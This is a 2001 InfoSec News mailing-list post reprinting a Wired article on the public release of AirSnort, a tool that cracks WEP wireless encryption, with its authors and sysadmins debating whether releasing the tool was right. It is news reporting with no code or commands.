[ISN] Wireless Networks in Big Trouble

From: InfoSec News (isnat_private)
Date: Tue Aug 21 2001 - 01:04:34 PDT

  • Next message: InfoSec News: "[ISN] Hacking Hotmail made easy"

    By Michelle Delio 
    2:20 p.m. Aug. 20, 2001 PDT 
    Wireless networks are a little less secure today with the public
    release of "AirSnort," a tool that can surreptitiously grab and
    analyze data moving across just about every major wireless network.
    When enough information has been captured, AirSnort can then piece
    together the system's master password.
    In other words, hackers and/or eavesdroppers using AirSnort can just
    grab what they want from a company's database wirelessly, out of thin
    AirSnort's abilities aren't groundbreaking - security experts know all
    too well that wireless networks can be easily accessed and monitored
    by outsiders. But a fully featured tool to facilitate password-grabs
    wasn't readily available until this past weekend, when AirSnort was
    released on the Internet.
    "AirSnort certainly ups the ante in the sense that with this tool,
    your 'encrypted wireless net' can be quickly and easily breached,"
    said Randy Sandone of Argus, a security company.
    "Once AirSnort breaks the encryption, you're basically hosed. A
    malicious hacker can read any packet traveling over the network,
    gather information, passwords -- you name it."
    Wireless networks transmit information over public airwaves, the same
    medium used by television, radio and cell phones. The networks are
    supposed to be protected by a built-in security feature, the Wired
    Equivalent Privacy system (WEP) -- also known as the 802.11b standard
    -- which encrypts data as it is transmitted.
    But WEP/802.11b has proved to be quite crackable. And that's exactly
    why AirSnort was publicly released, said AirSnort programmers Jeremy
    Bruestle and Blake Hegerle. They hope that AirSnort will prove once
    and for all that wireless networks protected only by WEP are not
    "Yes, AirSnort can be used as a cracking tool, but it can also be used
    as a really big stick in an argument over the safety of WEP," Hegerle
    "We felt that the only proper thing to do was to release the project,"
    Bruestle said. "It is not obvious to the layman or the average
    administrator how vulnerable 802.11b is to attack. It's too easy to
    trust WEP. Honestly, there is a lot of work involved in hardening a
    wireless network. It's easy to be complacent. AirSnort is all about
    opening people's eyes."
    Added Sandone: "Perhaps its release will prompt wireless vendors to
    significantly enhance the encryption of their products. And hopefully
    users will come to understand that encryption (regardless of how it is
    used) is not a panacea."
    "Some people overhype the power of encryption, and others put too much
    faith in its 'mathematical precision.' It clearly has its value, but
    it shouldn't be the only security mechanism in use."
    "Weaknesses in the Key Scheduling Algorithm of RC4," a recently
    published paper by Scott Fluhrer, Itsik Mantin and Adi Shamir,
    outlined a way to learn the master key to the WEP encryption system,
    which would allow an intruder to pose as a legitimate user of the
    Adam Stubblefield, a Rice University undergraduate who was working as
    a summer intern at AT&T Labs, tested that exploit (with the permission
    of the network's administrator) and was able to pull up the network's
    master password in just under two hours.
    Stubblefield published his research on the Internet, but did not
    release the program he used to access AT&T's wireless network.
    If the software that he wrote to grab passwords were published,
    Stubblefield told a reporter from The New York Times, anyone with a
    basic knowledge of computers and a wireless network card could easily
    crack many wireless networks.
    "Basically I read the paper and wondered if the attack would actually
    work in the real world, and how hard it would be to implement,"
    Bruestle said. "I am the CEO of a small security firm, Cypher42, and I
    wanted to know just how difficult or easy it would be to implement the
    attack, so we could properly advise clients on 802.11b security."
    Another tool, WEPcrack, was released on the Internet around the same
    time as AirSnort, but WEPcrack is still considered an alpha release, a
    work in progress.
    Bruestle and Hegerle's AirSnort is a beta release, a designation that
    indicates a program is not quite ready for primetime, but is further
    along feature and stability-wise than alpha.
    Bruestle said he and Hegerle had a basic working version of AirSnort
    after less than 24 hours of programming time.
    Bruestle said he has received many e-mails about AirSnort, some in
    favor of the public release of the tool, others accusing him of adding
    to the malicious hackers' arsenal.
    "Many of the people who have e-mailed me about AirSnort are sysadmins
    who thanked me for giving them a way to convince management that WEP
    really is insecure," Bruestle said. "Of course, I have gotten a number
    of flame mails too, comparing the release of AirSnort to 'giving guns
    to children.' I understand the viewpoint of those who believe
    dangerous information should be hidden, but I disagree."
    Hegerle and Bruestle said that they believe that many people did not
    understand the academic nature of Fluhrer, Mantin and Shamir's paper,
    and may not understand how vulnerable wireless systems are.
    "It was beyond even my humble attempts to understand (the paper's)
    full depths," Bruestle said. "The implications of a tool like AirSnort
    are much harder to deny than the paper it was based on."
    AirSnort uses a completely passive attack: An AirSnort user needs only
    a Linux-operated computer with a wireless network card, and access to
    whatever wireless network he or she wishes to crack.
    Many wireless networks allow amazingly easy access to unauthorized
    users, as some have discovered when their laptops suddenly connect to
    the Internet when they are in or near a building that has a wireless
    "I've been able to connect to networks when standing outside of
    businesses, hospitals or Internet cafs that offer the service," said
    Mark Denon, a freelance technology writer.
    "You can jump in and use the network to send e-mail or surf the Net,
    and often it's quite possible to access whatever information is moving
    across the network. It's very easy to piggyback onto many wireless
    networks, and some people make a game of driving or walking around a
    city and seeing how many networks they can jump into."
    "A wireless card in the machine that's running AirSnort does not send
    out any data or actually talk with any of the other machines on the
    network," said Hegerle. "It simply listens to all the other traffic,
    so it doesn't matter if the network allows unauthorized access, as
    none of the other machines on the network will even know anyone is
    listening," said Hegerle.
    The amount of time required to piece together a password with AirSnort
    depends on a number of factors, Bruestle said, but mostly depends on
    the amount of network traffic and "luck."
    "On a highly saturated network, AirSnort can usually collect enough
    packets to guess the key in three or four hours. If the network is
    very low traffic, it can take days to get enough data," Bruestle said.
    "Since the attack is based on probability, the actual number of
    packets required to guess a given key varies from key to key,
    sometimes significantly."
    AirSnort monitoring does not have to be all done in one session,
    though. "Five hours one day and five the next works out to be about
    the same as 10 hours in a row," Bruestle said.
    Systems administrators have mixed reactions over the release of
    "Granted, this program will hammer the truth into people's heads about
    the insecure nature of any wireless network protected only by WEP,"
    said Gerry Kaufman, a medical network and systems consultant. "But
    releasing this tool also allows a lot of people access to networks who
    couldn't have cracked them before. I'm really torn between advocating
    open access to information, and keeping tools like AirSnort out of the
    hands of kids with too much free time on their hands."
    Kaufman said the "only good thing" that could come from AirSnort's
    release is its use for proving to "those who approve the expenditures"
    that wireless networks need stronger protection.
    Hegerle and Bruestle suggest that wireless network users look into
    other end-to-end forms of encryption, such as Virtual Private Networks
    (VPNs) to protect data going over wireless networks.
    "While this requires more work, the false sense of security WEP offers
    is worse than no security at all," Bruestle said.
    "Quite simply, I won't be happy until there are no people trusting
    their data to WEP as it now exists," Hegerle said. "There are several
    possible ways to change WEP, and I would like to see a new dialog
    begin, one that looks for a replacement to the badly designed WEP we
    are now stuck with."
    Under development are new versions of WEP/802.11b that will include
    stronger security features. But the new standards won't be released
    until mid-2002 at the earliest.
    ISN is currently hosted by Attrition.org
    To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
    of the mail.

    This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 04:09:16 PDT